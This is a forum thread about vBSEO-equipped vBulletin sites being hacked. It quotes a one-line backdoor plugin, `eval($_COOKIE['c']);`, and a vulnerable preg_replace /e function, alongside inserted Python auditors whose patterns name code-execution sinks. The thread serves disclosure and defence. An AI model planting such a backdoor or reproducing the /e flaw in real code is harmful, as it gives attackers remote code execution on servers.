Just got a confirmation from vBSEO that the patch was in their repo, but not in the current version. They said they have updated the current version just now to include the patch. I really hope they notify their customer base because this exploit is a year old. Bots are probably pre-programmed with this attack vector and there are likely hundreds of them. If you have updated vBSEO in the last year, you stand a good chance of being vulnerable. UPGRADE YOUR INSTALL NOW!
Possible Exploit
-
Just in case - you do have the following .htaccess protection in all writable directories?
Code:
<Files ~ "\.(php\d*|cgi|pl|phtml)$">
order allow,deny
deny from all
</Files>
-
Trust me, the reason this happened is because that patch was missing. Bots have been searching for this exploit for almost a year now. When we upgraded to 3.6.0 the hole was reopened and the bots did what they do.
-
It is vBSEO.
All our non-vBSEO sites did not get hacked.
All our vBSEO sites without "Add Page Titles to External Links Anchor Text" enabled did not get hacked.
All our vBSEO sites with "Add Page Titles to External Links Anchor Text" enabled got hacked.
We have every single directory properly permissioned via Apache CONF file and by hand issuing CHMOD commands. We also have our AdminCP in a different directory and it is password protected through .htpasswd.
There are no entries in Control Panel logs that relate to this plugin creation. It was done via injection.
-
I have a number of sites I've checked with VBSEO installed and they didn't have this plugin. However a few sites all with vBSEO have them. One site had a "test" plugin for ajax_complete and it referenced:
eval($_COOKIE['c']);
Here is a site that references a PHP compromise with similar code...
http://translate.google.com/translate?hl=en&sl=zh-CN&u=http://www.dis9.com/tools&ei=nH8dT9XALMSKsQLH4dSdCw&sa=X&oi=translate&ct=result&resnum=2&ved=0CDYQ7gEwAQ&prev=/search%3Fq%3Deval(%24_COOKIE%5B%27c%27%5D)%3B%26hl%3Den%26safe%3Doff%26client%3Dsafari%26r ls%3Den%26prmd%3Dimvns
This is a very bad plugin. Very bad. You need to remove it as quickly as possible. With it, your attackers could gain access to your entire server.
Translations provided by Google.
Wayne Luke
The Rabid Badger - a vBulletin Cloud demonstration site.
vBulletin 5 API
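Added example, not part of the original posts: a small audit that flags stored plugin code in which request data reaches a code-execution call, the pattern of the `eval($_COOKIE['c']);` plugin quoted above. The row layout (pluginid, hookname, phpcode) and all sample rows except the quoted line are assumptions constructed for the example.

```python
import re

# Code-execution sinks; the lookbehind keeps names like curl_exec from matching.
SINK = r"(?<![a-z0-9_])(?:eval|assert|create_function|system|passthru|shell_exec|exec)"
SOURCE = r"\$_(?:COOKIE|GET|POST|REQUEST|SERVER|FILES)\b"
WRAP = r"\((?:[a-z0-9_]+\()*"   # opening paren plus nested calls such as base64_decode(

DIRECT = re.compile(SINK + WRAP + SOURCE, re.I)
ASSIGN = re.compile(r"(\$[a-z_][a-z0-9_]*)=(?:[a-z0-9_]+\()*" + SOURCE, re.I)

def normalize(php):
    """Drop /* */ comments and all whitespace so spacing tricks do not hide a match."""
    return re.sub(r"\s+", "", re.sub(r"/\*.*?\*/", "", php, flags=re.S))

def classify(phpcode):
    """Return a reason string if the code looks like a request-driven backdoor, else None."""
    code = normalize(phpcode)
    if DIRECT.search(code):
        return "request data passed straight to a code sink"
    # One-step taint: a variable filled from request data and later given to a sink.
    for var in set(ASSIGN.findall(code)):
        if re.search(SINK + WRAP + re.escape(var) + r"\b", code, re.I):
            return "request data reaches a code sink through " + var
    return None

def scan_plugins(rows):
    """rows: iterable of (pluginid, hookname, phpcode); returns the flagged ones."""
    hits = []
    for pluginid, hookname, phpcode in rows:
        reason = classify(phpcode)
        if reason:
            hits.append((pluginid, hookname, reason))
    return hits

# Constructed sample rows. Row 2 carries the line quoted in the thread.
SAMPLE_ROWS = [
    (1, "global_start", "$show['sidebar'] = true;"),
    (2, "ajax_complete", "eval($_COOKIE['c']);"),
    (3, "init_startup", "$p = $_POST [ 'p' ]; /* x */ eval ( base64_decode( $p ) );"),
    (4, "global_start", "$lang = intval($_COOKIE['lang']);"),
]

if __name__ == "__main__":
    for hit in scan_plugins(SAMPLE_ROWS):
        print(hit)
```

A hit is a reason to review the plugin by hand; a clean result does not prove the plugin list is clean, since the patterns cover only direct and one-step flows.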
-
It seems like people believe this latest vBSEO patch fixes this. IT DOES NOT. 3.6.0 of vBSEO had this patch since release (so users of vBSEO 3.6.0 don't have to apply the patch today as it doesn't patch anything) and my forum has been running with it. This exploit plugin has been added while the forums were already running vBSEO 3.6.0! The current code is still vulnerable!
-
Here it is folks, in functions_vbseocp_abstract.php
PHP Code:
public static function proc_deutf($ptxt, $tocharset)
{
    $ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')', $ptxt);
    return $ptxt;
}
PHP Code:
public static function proc_deutf($ptxt, $tocharset)
{
    $ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s : \'$1\').stripslashes(\'$2\')', $ptxt);
    return $ptxt;
}
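Added example, not code from the thread or from vBSEO: the two `proc_deutf` bodies posted above differ only in whether the `$1` backreference sits in double or single quotes inside a replacement that the `e` modifier evaluates as PHP. This checker rebuilds the evaluated replacement from a `preg_replace` call and reports which case it is; the third sample line is constructed.

```python
import re

SQ_BODY = r"(?:\\.|[^'\\])*"   # body of a PHP single-quoted literal
DQ_BODY = r'(?:\\.|[^"\\])*'   # body of a PHP double-quoted literal
SQ = re.compile("'(" + SQ_BODY + ")'", re.S)
CALL = re.compile(r"preg_replace\s*\(\s*'(" + SQ_BODY + r")'\s*,(.*)", re.S)
TOKEN = re.compile('"' + DQ_BODY + '"|\'' + SQ_BODY + "'", re.S)
BACKREF = re.compile(r"(?:\$\{?|\\)\d")   # $1, ${1} or \1
CLOSERS = {"(": ")", "{": "}", "[": "]", "<": ">"}

def unquote(literal):
    # Inside single quotes PHP only unescapes a quote and a backslash.
    return re.sub(r"\\(['\\])", r"\1", literal)

def classify_call(php):
    """Classify one preg_replace() statement whose pattern is a single-quoted literal."""
    m = CALL.search(php)
    if m is None:
        return None
    pattern = unquote(m.group(1))
    if not pattern:
        return None
    end = CLOSERS.get(pattern[0], pattern[0])
    if "e" not in pattern[pattern.rfind(end) + 1:]:
        return "no e-modifier"
    # The text PHP will eval: the literal pieces, with X standing in for variables.
    evaluated = "X".join(unquote(s) for s in SQ.findall(m.group(2)))
    for tok in TOKEN.findall(evaluated):
        # In a double-quoted string PHP interpolation applies to the matched input.
        if tok.startswith('"') and BACKREF.search(tok):
            return "e-modifier, backreference inside double quotes"
    return "e-modifier, no backreference inside double quotes"

# POSTED_A and POSTED_B are the statements from the post; CONSTRUCTED is made up here.
POSTED_A = r"""$ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')', $ptxt);"""
POSTED_B = r"""$ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s : \'$1\').stripslashes(\'$2\')', $ptxt);"""
CONSTRUCTED = r"""$s = preg_replace('/\s+/u', ' ', $s);"""

if __name__ == "__main__":
    for sample in (POSTED_A, POSTED_B, CONSTRUCTED):
        print(classify_call(sample))
```

The `e` modifier was deprecated in PHP 5.5 and removed in PHP 7.0; `preg_replace_callback` is the replacement that avoids evaluating the substitution as code at all.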
-
It is a pretty old unknown exploit then to be in both 3.8.X and 4.X. There was an issue with group searching in both versions and this was patched before 4.1.4 was released so it could be related to that if people didn't apply both patches or they were exploited before they patched. I haven't seen anything pointing to a new exploit yet though. We've had several potential issues submitted to us but they could not be replicated. If you have additional information then you should share it.
-
I have no idea if it is in 3.8.X, it happened to me around 4.1.8 (I can't know for sure because all I can see is the plugin id, and it's after I installed a plugin sometime in November, and before I updated to vBulletin 4.1.10). I've always been quick with applying security patches too. I don't think this is an exploit in vBulletin itself, because so far affected users are only people who use vBSEO (from what I have seen, I may be wrong). I don't know much more than that; unless it was a vulnerability that has been fixed between 4.1.8 and 4.1.10 of vBulletin, it is very likely to still be active.